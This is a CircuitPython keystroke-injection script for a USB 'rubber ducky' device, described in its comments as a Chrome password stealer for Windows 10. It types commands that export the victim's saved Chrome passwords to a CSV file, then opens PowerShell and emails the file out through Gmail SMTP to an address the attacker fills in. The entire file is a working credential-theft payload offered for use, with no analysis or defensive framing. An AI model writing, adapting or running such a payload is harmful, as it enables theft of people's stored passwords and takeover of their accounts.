import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS as KeyboardLayout
from adafruit_hid.keycode import Keycode
from time import sleep


kbd = Keyboard(usb_hid.devices)
layout = KeyboardLayout(kbd)

# ducky payload starts here

# Author: Guereak
# Ducky chrome password stealer for Windows 10
# ----------- opens chrome web browser
kbd.send(Keycode.GUI, Keycode.R)
sleep(0.5)
layout.write("chrome")
sleep(0.4)
kbd.send(Keycode.ENTER)
sleep(0.6)
# ----------- exports passwords into csv file
layout.write("chrome://settings/passwords")
kbd.send(Keycode.ENTER)
sleep(1.0)
kbd.send(Keycode.TAB)
sleep(0.1)
kbd.send(Keycode.TAB)
sleep(0.1)
kbd.send(Keycode.TAB)
sleep(0.1)
kbd.send(Keycode.TAB)
sleep(0.1)
kbd.send(Keycode.TAB)
sleep(0.1)
kbd.send(Keycode.TAB)
sleep(0.1)
kbd.send(Keycode.TAB)
sleep(0.1)
kbd.send(Keycode.ENTER)
sleep(0.2)
kbd.send(Keycode.ENTER)
sleep(0.2)
kbd.send(Keycode.ENTER)
sleep(0.7)
layout.write("chromepasswords.csv")
sleep(0.2)
kbd.send(Keycode.ENTER)
sleep(1.0)
kbd.send(Keycode.CONTROL, Keycode.W)
sleep(0.1)
# -------------- sends it by email using powershell
kbd.send(Keycode.GUI, Keycode.R)
sleep(0.2)
layout.write("powershell")
kbd.send(Keycode.ENTER)
sleep(0.5)
layout.write("$SMTPServer = 'smtp.gmail.com'")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("$SMTPInfo.EnableSSL = $true")
kbd.send(Keycode.ENTER)
sleep(0.1)
# ---Make sure to enable less secure app access to sender's mail here: https://myaccount.google.com/lesssecureapps
layout.write("$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('YOUR SENDER EMAIL HERE@gmail.com', 'SENDER'S EMAIL PASSWORD')")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("$SMTPServer = $E = New-Object System.Net.Mail.MailMessage")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("$E.From = 'YOUR SENDER EMAIL HERE@gmail.com'")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("$E.To.Add('RECIEVER'S MAIL@gmail.com')")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("$E.Subject = $env:UserName")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("$E.Body = 'Success! The password file is attached!'")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("$F = 'Documents/chromepasswords.csv'")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("$E.Attachments.Add($F)")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("$F = $SMTPInfo.Send($E)")
kbd.send(Keycode.ENTER)
sleep(0.1)
layout.write("exit")
kbd.send(Keycode.ENTER)
